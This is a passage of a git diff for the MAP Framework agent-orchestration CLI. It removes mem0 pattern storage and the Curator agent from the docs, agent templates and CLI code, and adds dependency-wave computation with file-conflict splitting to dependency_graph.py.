(branch → project → org) -- Semantic search across all tiers -- Fingerprint-based deduplication -- Enables cross-project learning - -**Setup:** - -See mem0 MCP server documentation for installation instructions. - ### Claude-Reviewer (Professional Review) - Automated security and quality analysis @@ -364,22 +332,6 @@ See mem0 MCP server documentation for installation instructions. - Analyze architectural patterns - Learn from production implementations -## ACE Learning (Knowledge Management) - -The MAP Framework includes an ACE-style learning system via mem0 MCP: - -- **Reflector agent**: Extracts lessons from successes and failures -- **Curator agent**: Maintains structured knowledge base via mem0 MCP -- **mem0 tiered storage**: Patterns stored across namespaces (branch → project → org) with categories: - - implementation - - security - - architecture - - debugging - - testing - - performance - -> **Note (v4.0+):** Pattern storage uses mem0 MCP. The system automatically grows as you use MAP commands with fingerprint-based deduplication. - ## Optional: Semantic Search For enhanced pattern retrieval using semantic similarity instead of keyword matching: @@ -499,17 +451,6 @@ ls ~/.claude/local/claude Check that MCP servers are properly configured in your Claude Code settings. The configuration file is at `.claude/mcp_config.json`. -### Issue: Pattern search not working (mem0 MCP) - -As of v4.0, pattern storage and retrieval is handled by the mem0 MCP server (not local semantic search). - -Verify that: - -- mem0 MCP is enabled in your Claude Code MCP configuration (`.claude/mcp_config.json` or Claude settings) -- the mem0 MCP server is reachable from Claude Code - -If mem0 is misconfigured, you may see missing context in workflows that call `mcp__mem0__map_tiered_search`. - ## Uninstalling To remove MAP Framework: @@ -520,7 +461,6 @@ rm -rf .claude/agents/ rm -rf .claude/commands/ rm .claude/mcp_config.json rm -rf .claude/embeddings_cache/ -# Note: mem0 data is managed by mem0 MCP server, not local files # Uninstall mapify CLI uv tool uninstall mapify-cli diff --git a/docs/USAGE.md b/docs/USAGE.md index 1e1d016..e26d2c3 100644 --- a/docs/USAGE.md +++ b/docs/USAGE.md @@ -15,13 +15,10 @@ Complete usage examples, best practices, and optimization strategies for the MAP - [When to Use Self-MoA](#when-to-use-self-moa) - [Example Synthesis](#example-synthesis) - [Token Cost Considerations](#token-cost-considerations) -- [Pattern Storage & Retrieval (mem0 MCP)](#-pattern-storage--retrieval-mem0-mcp) - [Common CLI Mistakes](#-common-cli-mistakes) - - [Wrong Approach](#wrong-approach-critical) - [Wrong Operation Field Name](#wrong-operation-field-name) - [Quick Reference Resources](#quick-reference-resources) - [Validation Tools](#validation-tools) -- [Pattern Search Tips (mem0 MCP)](#-pattern-search-tips-mem0-mcp) - [Dependency Validation](#dependency-validation) - [Basic Usage](#basic-usage) - [Visualization Mode](#visualization-mode) @@ -170,37 +167,6 @@ Self-MoA uses ~4x tokens per subtask: --- -## 🧠 Pattern Storage & Retrieval (mem0 MCP) - -As of v4.0, patterns are stored and retrieved via the mem0 MCP server. There is no local CLI workflow for pattern search/update. - -### Tiered Pattern Search - -Use `mcp__mem0__map_tiered_search` to search across scopes (branch → project → org): - -```bash -# Basic search -mcp__mem0__map_tiered_search(query="JWT authentication", limit=5) - -# Narrow search by section (example) -mcp__mem0__map_tiered_search(query="error handling", section_filter="ERROR_HANDLING_PATTERNS", limit=10) -``` - -### Adding / Archiving Patterns - -Patterns should be written through the Curator agent (deduplication + fingerprinting): - -```bash -Task(subagent_type="curator", ...) - -# Curator uses mem0 MCP tools: -# - mcp__mem0__map_add_pattern -# - mcp__mem0__map_archive_pattern -# - mcp__mem0__map_promote_pattern -``` - ---- - ## ⚠️ Common CLI Mistakes This section documents frequently encountered CLI command errors and their corrections. These validations are enforced by: @@ -208,22 +174,6 @@ This section documents frequently encountered CLI command errors and their corre - E2E tests (`tests/test_agent_cli_correctness.py`) - Agent template CLI reference sections -### Common Mistakes (v4.0+) - -| ❌ Incorrect | ✅ Correct | Explanation | -|-------------|-----------|-------------| -| Using legacy CLI commands (`mapify playbook ...`) | Use `mcp__mem0__map_tiered_search` | Legacy CLI is not used for patterns in v4.0+ | -| Calling mem0 tools directly from workflow docs | Use `Task(subagent_type="curator", ...)` for writes | Curator handles dedupe + quality scoring | - -### Wrong Approach (CRITICAL) - -| ❌ NEVER DO THIS | ✅ ALWAYS USE THIS | Why | -|------------------|-------------------|-----| -| Direct mem0 MCP calls without Curator | `Task(subagent_type="curator", ...)` | Curator validates quality, checks duplicates via tiered search | -| Manually creating patterns | `mcp__mem0__map_add_pattern` via Curator | Fingerprint-based deduplication prevents duplicates | - -> **Note (v4.0+):** Pattern storage uses mem0 MCP. Use mem0 tools: `mcp__mem0__map_tiered_search`, `mcp__mem0__map_add_pattern`, `mcp__mem0__map_archive_pattern`. - ### Wrong Operation Field Name | ❌ Incorrect JSON | ✅ Correct JSON | @@ -272,36 +222,6 @@ git commit --no-verify # NOT RECOMMENDED --- -## 🧠 Pattern Storage (mem0 MCP) - -> **v4.0+** — Pattern storage uses mem0 MCP. The legacy Knowledge Graph SQLite modules have been removed. - -Pattern retrieval, contradiction detection, and knowledge management are all handled through mem0 MCP tools. See the Pattern Search Tips section below for practical usage. - ---- - -## 🔍 Pattern Search Tips (mem0 MCP) - -As of v4.0, pattern search is provided by mem0 MCP. Unlike legacy FTS5-based search, mem0 search is semantic and works best with descriptive queries. - - -### Practical Query Guidelines - -- Include the concrete technology and intent (e.g. "JWT refresh tokens", "Go error handling") -- Add qualifiers when results are too broad (e.g. "PostgreSQL", "FastAPI", "rate limiting") -- Prefer natural language for conceptual lookups (e.g. "how to handle retries with jitter") - -```bash -# Basic search (tiered: branch → project → org) -mcp__mem0__map_tiered_search(query="JWT authentication", limit=5) - -# More specific query -mcp__mem0__map_tiered_search(query="retry with exponential backoff and jitter", limit=5) - -# Section-filtered search (when you know the category) -mcp__mem0__map_tiered_search(query="input validation", section_filter="SECURITY_PATTERNS", limit=10) -``` - ## 🔄 Handling Context Compaction MAP workflows automatically save progress to the `.map/` directory, which persists across context compactions. This ensures your work is never lost, even if the conversation context is cleared. @@ -913,7 +833,7 @@ MAP Framework offers three primary implementation workflows with different trade - ✅ Refactoring with clear scope **Why it's better than /map-fast:** -- Learning available via `/map-learn` after workflow (Reflector/Curator) +- Learning available via `/map-learn` after workflow (Reflector) - Conditional Predictor catches high-risk issues - Final-Verifier provides adversarial verification - Only 10% less token savings but much safer @@ -1079,10 +999,9 @@ MAP Framework offers three primary implementation workflows with different trade - Low-risk tasks (simple CRUD, UI updates) skip impact analysis 2. **Learning Decoupled to /map-learn** (token savings during main workflow) - - Reflector and Curator are NOT called during /map-efficient execution + - Reflector is NOT called during /map-efficient execution - Run `/map-learn` after workflow completes to extract patterns - Reflector then analyzes ALL subtasks together (batched, more holistic insights) - - Curator makes a single knowledge base update (deduplication via mem0) 3. **Evaluator Not Invoked** (8-12% savings) - Monitor provides sufficient validation for most tasks @@ -1091,7 +1010,7 @@ MAP Framework offers three primary implementation workflows with different trade - Quality still ensured by Monitor's comprehensive checks **What's Preserved:** -- ✅ Learning available via `/map-learn` (Reflector + Curator, optional after workflow) +- ✅ Learning available via `/map-learn` (Reflector, optional after workflow) - ✅ Tests gate + Linter gate per subtask - ✅ Final-Verifier (adversarial verification at end) - ✅ Essential quality gates (Monitor validation) @@ -1144,7 +1063,7 @@ START: I need to implement a feature **✅ Reality:** Monitor still validates every subtask. Evaluator is not invoked (it only runs in /map-debug and /map-review), but Tests gate, Linter gate, and Final-Verifier ensure quality. **❌ Misconception:** "Learning via /map-learn is inferior to per-subtask learning" -**✅ Reality:** /map-learn runs Reflector/Curator after the workflow completes, analyzing ALL subtasks together. This batched approach sees patterns ACROSS subtasks, often producing better insights than isolated per-subtask analysis. +**✅ Reality:** /map-learn runs Reflector after the workflow completes, analyzing ALL subtasks together. This batched approach sees patterns ACROSS subtasks, often producing better insights than isolated per-subtask analysis. ## 🎯 Best Practices @@ -1163,12 +1082,11 @@ The Actor agent now includes a 10-item Quality Checklist for self-review before 2. Explicit error handling (no silent failures) 3. Security review (SQL injection, XSS, sensitive data) 4. Test case identification (happy path + edge cases) -5. MCP tools usage (mcp__mem0__map_tiered_search, context7) +5. MCP tools usage (context7, sequential-thinking) 6. Template variable preservation (orchestration compatibility) 7. Trade-offs documentation (decision rationale) -8. Pattern tracking (ACE feedback loop) -9. Complete implementations (no ellipsis or placeholders) -10. Dependency justification (no unnecessary libraries) +8. Complete implementations (no ellipsis or placeholders) +9. Dependency justification (no unnecessary libraries) **How it works:** - Actor performs self-review before submission @@ -1252,7 +1170,6 @@ MAP Framework supports intelligent model selection per agent to balance capabili | **Monitor** | sonnet | Quality validation requires thoroughness | ➡️ | | **TaskDecomposer** | sonnet | Requires good understanding of requirements | ➡️ | | **Reflector** | sonnet | Pattern extraction needs reasoning | ➡️ | -| **Curator** | sonnet | Knowledge management requires care | ➡️ | | **DocumentationReviewer** | sonnet | Documentation analysis needs thoroughness | ➡️ | ### Cost Impact of Model Upgrades @@ -1270,12 +1187,12 @@ The upgrade of Predictor and Evaluator from haiku to sonnet provides: **1. Use `/map-efficient` workflow (RECOMMENDED)** - Skips Evaluator per subtask (Monitor provides sufficient validation) - Conditional Predictor (only called for high-risk changes) -- Reflector/Curator available via `/map-learn` after workflow +- Reflector available via `/map-learn` after workflow - **Token savings: 30-40%** **2. Use `/map-fast` for small, low-risk changes** - Minimal agent sequence: TaskDecomposer → Actor → Monitor -- Skips: Predictor, Evaluator, Reflector, Curator +- Skips: Predictor, Evaluator, Reflector - **Token savings: 40-50%** (but no learning!) ### How It Works @@ -1448,7 +1365,6 @@ Skills follow the 500-line rule: **System architecture:** - `agent-architecture.md` - How 12 agents orchestrate -- `mem0-patterns.md` - Knowledge storage, quality scoring ### Creating Custom Skills @@ -1467,7 +1383,6 @@ MAP Framework implements defense-in-depth security via three complementary layer ### Layer 1: Behavioral Rules (CLAUDE.md) Guidelines in `.claude/CLAUDE.md` that guide agent behavior: -- NEVER skip mem0 deduplication checks - NEVER write code as orchestrator - NEVER commit .env files @@ -1896,7 +1811,7 @@ MAP: [Prompt Improver Hook seeking clarification] User: [Selects option] -MAP: [Proceeds with full context + mem0 patterns] +MAP: [Proceeds with full context] ``` **Bypass options:** @@ -1920,7 +1835,7 @@ MAP: [Proceeds with full context + mem0 patterns] MAP uses **multiple UserPromptSubmit hooks** that run in parallel: 1. **Prompt-Improver** – Disambiguates vague prompts (wraps prompt with evaluation instructions) -2. **Pattern Injection** – Adds relevant mem0 patterns, and suggests workflows and skills +2. **Pattern Injection** – Adds relevant patterns, and suggests workflows and skills > **Note:** Claude Code executes all matching hooks in parallel. Each hook's `additionalContext` output is concatenated and added to the prompt. The order is not guaranteed, but both enhancements are applied. @@ -1928,7 +1843,7 @@ MAP uses **multiple UserPromptSubmit hooks** that run in parallel: **Benefits:** - Both hooks enhance the prompt with different types of context -- Prompt-Improver adds evaluation wrapper, Pattern Injection adds mem0 patterns/workflows/skills +- Prompt-Improver adds evaluation wrapper, Pattern Injection adds patterns/workflows/skills - Modular design (hooks can be disabled independently) - Parallel execution (efficient) diff --git a/docs/WORKFLOW_FLOW.md b/docs/WORKFLOW_FLOW.md index 2f7f299..9ee80f6 100644 --- a/docs/WORKFLOW_FLOW.md +++ b/docs/WORKFLOW_FLOW.md @@ -131,17 +131,8 @@ └──────────────────┬──────────────────────────────────┘ ↓ ┌─────────────────────────────────────────────────────┐ -│ Turn 5: get_next_step → step_id=2.1, MEM0_SEARCH │ -│ │ -│ Hook НАПОМИНАЕТ перед КАЖДЫМ Tool call: │ -│ ⚠️ "Call mcp__mem0__map_tiered_search BEFORE Actor" -│ │ -│ Выполняет: mcp__mem0__map_tiered_search(...) │ -│ Валидирует: validate_step "2.1" │ -└──────────────────┬──────────────────────────────────┘ - ↓ ┌─────────────────────────────────────────────────────┐ -│ Turn 6: get_next_step → step_id=2.3, ACTOR │ +│ Turn 5: get_next_step → step_id=2.3, ACTOR │ │ │ │ Hook НАПОМИНАЕТ: │ │ ⚠️ "Launch Task(subagent_type='actor')" │ @@ -151,7 +142,7 @@ └──────────────────┬──────────────────────────────────┘ ↓ ┌─────────────────────────────────────────────────────┐ -│ Turn 7: get_next_step → step_id=2.4, MONITOR │ +│ Turn 6: get_next_step → step_id=2.4, MONITOR │ │ │ │ Hook НАПОМИНАЕТ: │ │ ⚠️ "Launch Task(subagent_type='monitor')" │ @@ -165,7 +156,7 @@ └──────────────────┬──────────────────────────────────┘ ↓ ┌─────────────────────────────────────────────────────┐ -│ Turn 8: get_next_step → step_id=2.7, UPDATE_STATE │ +│ Turn 7: get_next_step → step_id=2.7, UPDATE_STATE │ │ │ │ Выполняет: Edit/Write tools │ │ │ @@ -176,11 +167,11 @@ └──────────────────┬──────────────────────────────────┘ ↓ ┌─────────────────────────────────────────────────────┐ -│ Turn 9-10: TESTS_GATE → LINTER_GATE │ +│ Turn 8-9: TESTS_GATE → LINTER_GATE │ └──────────────────┬──────────────────────────────────┘ ↓ ┌─────────────────────────────────────────────────────┐ -│ Turn 11: get_next_step → step_id=2.10, VERIFY │ +│ Turn 10: get_next_step → step_id=2.10, VERIFY │ │ │ │ Hook НАПОМИНАЕТ: │ │ ⚠️ "Output self-audit before marking complete" │ @@ -214,7 +205,6 @@ | **1.56** | CHOOSE_MODE | Выбор режима выполнения (step_by_step\|batch) | ✅ Да | | **1.6** | INIT_STATE | Создание workflow_state.json | ✅ Да | | **2.0** | XML_PACKET | Построение AI-friendly пакета | ✅ Да (для каждого ST) | -| **2.1** | MEM0_SEARCH | Поиск паттернов в mem0 | ✅ Да (для каждого ST) | | **2.2** | RESEARCH | research-agent для контекста | 🔶 Условно (если 3+ файлов) | | **2.3** | ACTOR | Actor генерирует код | ✅ Да (для каждого ST) | | **2.4** | MONITOR | Monitor валидирует (retry до 5 раз) | ✅ Да (для каждого ST) | @@ -295,7 +285,7 @@ Claude видит: 19 шагов, 163 строки circuit breaker, 103 стро ↓ Claude "компрессирует" ментально: "Ok, просто запусти agents и пиши код" ↓ -⚠️ Пропускает: mem0 search (80%), self-audit (90%) +⚠️ Пропускает: research (80%), self-audit (90%) ``` ### ✅ Новый подход (v2.0.0) @@ -308,22 +298,17 @@ Turn 1: map_orchestrator говорит: "Step 1.0: Call task-decomposer" ↓ Claude: [Вызывает task-decomposer] ✅ ↓ -Turn 2: map_orchestrator говорит: "Step 2.1: Call mem0 search" - Hook напоминает: "⚠️ MANDATORY: Call mem0 BEFORE Actor" - ↓ -Claude: [Вызывает mem0] ✅ - ↓ -Turn 3: map_orchestrator говорит: "Step 2.3: Call Actor" +Turn 2: map_orchestrator говорит: "Step 2.3: Call Actor" Hook напоминает: "⚠️ MANDATORY: Launch Actor" ↓ Claude: [Вызывает Actor] ✅ ↓ -Turn 4: map_orchestrator говорит: "Step 2.4: Call Monitor" +Turn 3: map_orchestrator говорит: "Step 2.4: Call Monitor" Hook напоминает: "⚠️ MANDATORY: Launch Monitor" ↓ Claude: [Вызывает Monitor] ✅ ↓ -Turn 5: map_orchestrator говорит: "Step 2.7: Apply changes" +Turn 4: map_orchestrator говорит: "Step 2.7: Apply changes" Gate проверяет: actor+monitor выполнены ✅ ↓ Claude: [Применяет Edit/Write] ✅ @@ -360,9 +345,9 @@ CHECKPOINT: Calling task-decomposer Turn 5: ═══════════════════════════════════════════════════ MAP WORKFLOW CHECKPOINT -Current Step: 2.1 - MEM0_SEARCH +Current Step: 2.3 - ACTOR Progress: Subtask 1/5 -⚠️ MANDATORY: Call mem0 BEFORE Actor +⚠️ MANDATORY: Launch Actor ═══════════════════════════════════════════════════ Turn 8: diff --git a/requirements-semantic.txt b/requirements-semantic.txt deleted file mode 100644 index 3012bdc..0000000 --- a/requirements-semantic.txt +++ /dev/null @@ -1,13 +0,0 @@ -# Semantic Search Dependencies for ACE Playbook -# Install with: pip install -r requirements-semantic.txt - -# Core semantic search -sentence-transformers>=2.2.0 # ~500MB model download on first use -numpy>=1.24.0 # Vector operations -scikit-learn>=1.3.0 # Cosine similarity - -# Keras compatibility fix (required for transformers library) -tf-keras # Keras 2 (backwards-compatible with Keras 3) - -# Optional: Faster similarity search for large playbooks (100+ bullets) -# faiss-cpu>=1.7.4 # Facebook AI Similarity Search (uncomment if needed) diff --git a/src/mapify_cli/__init__.py b/src/mapify_cli/__init__.py index 4747953..ce297a5 100644 --- a/src/mapify_cli/__init__.py +++ b/src/mapify_cli/__init__.py @@ -538,7 +538,6 @@ def create_agent_files(project_path: Path, mcp_servers: List[str]) -> None: "predictor": create_predictor_content(mcp_servers), "evaluator": create_evaluator_content(mcp_servers), "reflector": create_reflector_content(mcp_servers), - "curator": create_curator_content(mcp_servers), "documentation-reviewer": create_documentation_reviewer_content( mcp_servers ), @@ -827,7 +826,7 @@ def create_reflector_content(mcp_servers: List[str]) -> str: return f"""--- name: reflector -description: Extracts structured lessons from execution attempts (ACE) +description: Extracts structured lessons from execution attempts tools: Read, Grep, Glob model: sonnet --- @@ -855,44 +854,6 @@ def create_reflector_content(mcp_servers: List[str]) -> str: """ -def create_curator_content(mcp_servers: List[str]) -> str: - """Create curator agent content""" - mcp_section = "" - - return f"""--- -name: curator -description: Manages structured patterns with incremental updates (ACE) -tools: Read, Write, Edit -model: sonnet ---- - -# IDENTITY - -You are a knowledge curator who maintains the ACE pattern store by integrating Reflector insights. -{mcp_section} -# ROLE - -Integrate Reflector insights into patterns using delta operations: -- ADD: New pattern bullets -- UPDATE: Increment helpful/harmful counters -- DEPRECATE: Remove harmful patterns - -## Quality Gates - -- Content length ≥ 100 characters -- Code examples for technical patterns -- Deduplication via semantic similarity -- Technology-specific (not generic advice) - -## Output Format (JSON) - -Return JSON with: -- reasoning: Why these operations improve patterns -- operations: Array of ADD/UPDATE/DEPRECATE operations -- deduplication_check: What duplicates were found -""" - - # Note: test-generator agent removed @@ -1086,7 +1047,7 @@ def create_command_files(project_path: Path) -> None: $ARGUMENTS -Call Reflector to extract patterns, then Curator to update pattern store. +Call Reflector to extract patterns from recent workflow. """, } @@ -1289,8 +1250,6 @@ def create_or_merge_project_settings_local(project_path: Path) -> None: default_permissions: Dict[str, Any] = { "allow": [ - # Allow all mem0 MCP tools (project-scoped) - "mcp__mem0__*", # SourceCraft MCP helpers (project-scoped) "mcp__sourcecraft__list_pull_request_comments", # Common safe Go workflows (project-scoped) @@ -1360,7 +1319,6 @@ def create_mcp_config(project_path: Path, mcp_servers: List[str]) -> None: "predictor": [], "evaluator": [], "reflector": [], - "curator": [], "documentation-reviewer": [], "debate-arbiter": [], "synthesizer": [], diff --git a/src/mapify_cli/dependency_graph.py b/src/mapify_cli/dependency_graph.py index 7c6dda0..f4b8f92 100644 --- a/src/mapify_cli/dependency_graph.py +++ b/src/mapify_cli/dependency_graph.py @@ -327,6 +327,124 @@ def dfs(node_id: str) -> None: return result + def compute_waves(self) -> Optional[List[List[str]]]: + """ + Compute execution waves from the dependency DAG using Kahn's algorithm. + + Each wave contains subtasks whose dependencies are all satisfied by + prior waves. Within a wave, subtasks can execute in parallel. + + Returns: + List of waves (each wave is a list of subtask IDs), or None if + cycle detected. Empty graph returns []. + + Performance: O(V+E) where V = nodes, E = edges + + Example: + >>> graph = DependencyGraph() + >>> graph.add_node(SubtaskNode(id="ST-001", dependencies=[])) + >>> graph.add_node(SubtaskNode(id="ST-002", dependencies=["ST-001"])) + >>> graph.add_node(SubtaskNode(id="ST-003", dependencies=["ST-001"])) + >>> graph.add_node(SubtaskNode(id="ST-004", dependencies=["ST-002", "ST-003"])) + >>> graph.compute_waves() + [['ST-001'], ['ST-002', 'ST-003'], ['ST-004']] + """ + if not self.nodes: + return [] + + # Compute in-degree for each node (only count edges to nodes in graph) + in_degree: Dict[str, int] = {nid: 0 for nid in self.nodes} + for nid, node in self.nodes.items(): + for dep_id in node.dependencies: + if dep_id in self.nodes: + in_degree[nid] += 1 + + # Collect initial zero-in-degree nodes as wave 0 + waves: List[List[str]] = [] + current_wave = sorted( + [nid for nid, deg in in_degree.items() if deg == 0] + ) + + processed = 0 + while current_wave: + waves.append(current_wave) + processed += len(current_wave) + next_wave_set: Set[str] = set() + + for nid in current_wave: + # Decrement in-degree for all dependents + for dependent_id in self.get_dependents(nid): + in_degree[dependent_id] -= 1 + if in_degree[dependent_id] == 0: + next_wave_set.add(dependent_id) + + current_wave = sorted(next_wave_set) + + # If not all nodes processed, there's a cycle + if processed != len(self.nodes): + return None + + return waves + + def split_wave_by_file_conflicts( + self, wave: List[str], affected_files_map: Dict[str, Set[str]] + ) -> List[List[str]]: + """ + Split a single wave into sub-waves where no two subtasks share files. + + Uses greedy coloring: each subtask is placed in the first sub-wave + that has no file overlap. Subtasks with empty/unknown affected_files + are treated as conflicting with all others (placed alone). + + Args: + wave: List of subtask IDs in one wave + affected_files_map: Dict mapping subtask_id -> set of affected file paths + + Returns: + List of sub-waves where no two subtasks in the same sub-wave share files + + Example: + >>> graph = DependencyGraph() + >>> wave = ["ST-002", "ST-003", "ST-004"] + >>> files = {"ST-002": {"a.py"}, "ST-003": {"b.py"}, "ST-004": {"a.py"}} + >>> graph.split_wave_by_file_conflicts(wave, files) + [['ST-002', 'ST-003'], ['ST-004']] + """ + if len(wave) <= 1: + return [wave] if wave else [] + + sub_waves: List[List[str]] = [] + sub_wave_files: List[Set[str]] = [] + + for subtask_id in wave: + files = affected_files_map.get(subtask_id, set()) + + # Empty/unknown files = conflict with everything, place alone + if not files: + sub_waves.append([subtask_id]) + sub_wave_files.append(set()) # placeholder + continue + + placed = False + for i, sw_files in enumerate(sub_wave_files): + # Skip sub-waves that contain an "unknown files" subtask + # (those have empty sw_files but exist in sub_waves) + if not sw_files and sub_waves[i]: + # This sub-wave has a subtask with unknown files + continue + # Check for file overlap + if not files & sw_files: + sub_waves[i].append(subtask_id) + sub_wave_files[i] |= files + placed = True + break + + if not placed: + sub_waves.append([subtask_id]) + sub_wave_files.append(set(files)) + + return sub_waves + def clear(self) -> None: """ Remove all nodes from graph. diff --git a/src/mapify_cli/templates/CLAUDE.md b/src/mapify_cli/templates/CLAUDE.md index 45550f3..74d928d 100644 --- a/src/mapify_cli/templates/CLAUDE.md +++ b/src/mapify_cli/templates/CLAUDE.md @@ -37,7 +37,6 @@ Verification: ## Safety expectations - Don't add or expose secrets. Avoid reading/writing `.env*` and credential/key files. -- When changing pattern storage behavior, ensure Curator-mediated writes through mem0 MCP are preserved (see `.claude/agents/curator.md` and `docs/ARCHITECTURE.md`). ## Bash Command Guidelines diff --git a/src/mapify_cli/templates/agents/actor.md b/src/mapify_cli/templates/agents/actor.md index 97fa53e..7ec0a71 100644 --- a/src/mapify_cli/templates/agents/actor.md +++ b/src/mapify_cli/templates/agents/actor.md @@ -12,10 +12,9 @@ last_updated: 2025-11-27 ┌─────────────────────────────────────────────────────────────────────┐ │ ACTOR AGENT PROTOCOL │ ├─────────────────────────────────────────────────────────────────────┤ -│ 1. mcp__mem0__map_tiered_search → BEFORE any implementation │ -│ 2. Implement complete code → No placeholders, no ellipsis │ -│ 3. Handle ALL errors → Explicit try/catch, no silent fails │ -│ 4. Document trade-offs → Alternatives considered, why chosen │ +│ 1. Implement complete code → No placeholders, no ellipsis │ +│ 2. Handle ALL errors → Explicit try/catch, no silent fails │ +│ 3. Document trade-offs → Alternatives considered, why chosen │ ├─────────────────────────────────────────────────────────────────────┤ │ REQUIRED: Use Edit/Write tools to apply code directly │ │ NEVER: Modify outside {{allowed_scope}} | Skip error handling │ @@ -82,20 +81,9 @@ This enables Synthesizer to extract and resolve decisions across variants. # MCP Tool Integration (Single Source of Truth) -## Mandatory Tools (Every Implementation) - -### 1. mcp__mem0__map_tiered_search — BEFORE Implementation -**Purpose**: Learn from past solutions, avoid repeating mistakes -**When**: ALWAYS, even for simple tasks -**Query Format**: `"[technology] [feature] implementation"` or `"[error type] solution"` - -**Note**: Actors no longer store patterns directly. After Monitor approval, run `/map-learn` to trigger Reflector → Curator → mem0 storage. - ---- - ## Research Tools (Optional — Use When Knowledge Gap Exists) -**Decision Rule**: Use if unfamiliar library/algorithm/architecture. Skip if existing patterns cover it. +**Decision Rule**: Use if unfamiliar library/algorithm/architecture. | Trigger | Tool | Purpose | |---------|------|---------| @@ -105,13 +93,7 @@ This enables Synthesizer to extract and resolve decisions across variants. ### Tool Selection Flowchart ``` -START → mcp__mem0__map_tiered_search (ALWAYS) - ↓ -Found relevant pattern in mem0? - YES → Apply pattern, implement - NO → Continue research - ↓ -Using external library? +START → Using external library? YES → context7: resolve-library-id → get-library-docs NO → Continue ↓ @@ -130,40 +112,6 @@ Monitor will validate written code ## Handling MCP Tool Responses -### mcp__mem0__map_tiered_search Results - -**Re-rank retrieved patterns** before use: -``` -FOR each pattern in results: - relevance_score = 0 - IF pattern.domain matches subtask_domain: relevance_score += 2 - IF pattern.language == {{language}}: relevance_score += 1 - IF pattern.created_at > (now - 30_days): relevance_score += 1 - IF pattern.metadata.validated == true: relevance_score += 1 - IF abs(pattern.complexity - subtask.complexity) <= 2: relevance_score += 1 - -SORT by relevance_score DESC -USE top 3 patterns (discard low-relevance noise) -``` - -**Multiple patterns found**: -- Apply re-ranking algorithm above -- Prefer highest relevance_score (not just most recent) -- Prefer patterns marked "validated" or "production" -- Document selection rationale in Trade-offs - -**Conflicting patterns**: -```yaml -conflict: "Pattern A says X, Pattern B says Y" -resolution: "Using Pattern A (higher relevance score: domain match + validated)" -action: "Document conflict in Trade-offs for Monitor review" -``` - -**Empty results**: -- Document: "No similar patterns in mem0. Novel implementation." -- Increase test coverage for unvalidated approach -- Flag in Trade-offs for extra Monitor scrutiny - ### context7 / deepwiki Results **Unclear or incomplete docs**: @@ -183,16 +131,9 @@ mitigation: "Added version check, comprehensive tests" **Library Implementation**: ``` -mcp__mem0__map_tiered_search("[library] implementation") - → (if no patterns) context7: get-library-docs +context7: get-library-docs → (if architecture unclear) deepwiki: ask_question - → implement → /map-learn (after approval) -``` - -**Algorithm Implementation**: -``` -mcp__mem0__map_tiered_search("[algorithm] implementation") - → review, adapt, test → /map-learn (after approval) + → implement ``` --- @@ -203,18 +144,8 @@ When multiple sources provide conflicting guidance, follow this priority (highes 1. **Explicit human instruction** in subtask description 2. **Security constraints** (NEVER override) -3. **mem0 patterns** (validated past patterns from tiered search) -4. **Research tools** (context7, deepwiki) -5. **Training data** (fallback) - -**Example conflict resolution**: -```yaml -conflict: - mem0_pattern_1: "Use polling for real-time updates" - mem0_pattern_2: "Use webhooks for real-time updates" -resolution: "Using pattern with higher relevance score and more recent validation" -action: "Document in Trade-offs for Monitor review" -``` +3. **Research tools** (context7, deepwiki) +4. **Training data** (fallback) @@ -262,8 +193,7 @@ Task( ## Skip Research If - Task is self-contained (new file, no dependencies) -- mem0 already has the pattern you need -- mcp__mem0__map_tiered_search returned sufficient context +- Existing patterns from context already cover the need --- @@ -309,7 +239,7 @@ Explain solution strategy in 2-3 sentences. Include: - MCP tools used and what they informed (if any) -"Implementing rate limiting using token bucket algorithm. mcp__mem0__map_tiered_search found similar pattern (impl-0089) for Redis-based limiting. Adapted for in-memory use per requirements." +"Implementing rate limiting using token bucket algorithm. Adapted standard Redis-based limiting pattern for in-memory use per requirements." ## 3. Code Changes @@ -407,18 +337,7 @@ VC1: - Tests: path/to/test_file.ext::test_name (or N/A with reason) ``` -## 7. Used Patterns (ACE Learning) - -**Format**: `["impl-0012", "sec-0034"]` or `[]` if none - -**How to identify pattern IDs**: -- Scan `{{existing_patterns}}` for your subtask's domain -- Note IDs you actually referenced during implementation -- Format in mem0: `[impl-0042] Description: ...` - -**If no patterns match**: `[]` with note "No relevant patterns in current mem0" - -## 8. Integration Notes (If Applicable) +## 7. Integration Notes (If Applicable) Only include if changes affect: - Database schema (migrations needed?) @@ -456,8 +375,7 @@ Only include if changes affect: - [ ] **Dependencies**: Known vulnerabilities checked (if new deps) ### MCP Compliance -- [ ] mcp__mem0__map_tiered_search called before implementation -- [ ] Research tools used if knowledge gap existed +- [ ] Research tools used if knowledge gap existed (context7, deepwiki) - [ ] Fallback documented if tools unavailable ### Output Completeness @@ -465,7 +383,6 @@ Only include if changes affect: - [ ] Trade-offs documented with alternatives - [ ] Test cases cover happy + edge + error paths - [ ] Each `validation_criteria` item has at least one automated test (or explicit N/A with reason) -- [ ] Used patterns tracked (or `[]` if none) - [ ] Template variables `{{...}}` preserved in generated code ### SFT Comfort Zone (Token Discipline) @@ -632,17 +549,6 @@ output: default: "Will implement read-through unless directed otherwise" ``` -## When mem0 Patterns Conflict - -```yaml -output: - status: PATTERN_CONFLICT - bullets: ["impl-0012", "impl-0089"] - conflict: "impl-0012 recommends polling, impl-0089 recommends webhooks" - analysis: "impl-0089 is newer, has better rationale for real-time needs" - resolution: "Using impl-0089 pattern - please confirm or override" -``` - ## When Implementation Exceeds Scope **Target**: 50-300 lines per subtask @@ -680,15 +586,14 @@ output: # for the completed portions ``` -## When All Tools Unavailable (Degraded Mode) +## When All Research Tools Unavailable (Degraded Mode) -If mcp__mem0__map_tiered_search AND research tools all fail: +If all research tools fail: ```yaml output: status: DEGRADED_MODE limitations: - - "mcp__mem0__map_tiered_search: timeout after 3 attempts" - "context7: service unavailable" - "deepwiki: connection refused" confidence: LOW @@ -751,30 +656,6 @@ Focus on: - - - -## Available Patterns (ACE Learning) - -{{#if existing_patterns}} - -**How to read pattern IDs**: `[category-NNNN]` where category = impl|sec|test|perf|arch|err - -{{existing_patterns}} - -**Usage**: -1. Identify relevant patterns by domain/technology -2. Apply patterns directly (adapt, don't copy) -3. Track applied pattern IDs in "Used Patterns" section - -{{/if}} - -{{#unless existing_patterns}} -*No patterns available yet. Your implementation will seed mem0 via /map-learn. Be extra thorough.* -{{/unless}} - - - --- # ===== REFERENCE MATERIAL ===== @@ -862,7 +743,7 @@ Default: **Subtask**: "Create user registration endpoint" -**Approach**: POST /api/register with email/password validation, bcrypt hashing, JWT response. mcp__mem0__map_tiered_search found sec-0012 (password hashing) and impl-0034 (validation patterns). +**Approach**: POST /api/register with email/password validation, bcrypt hashing, JWT 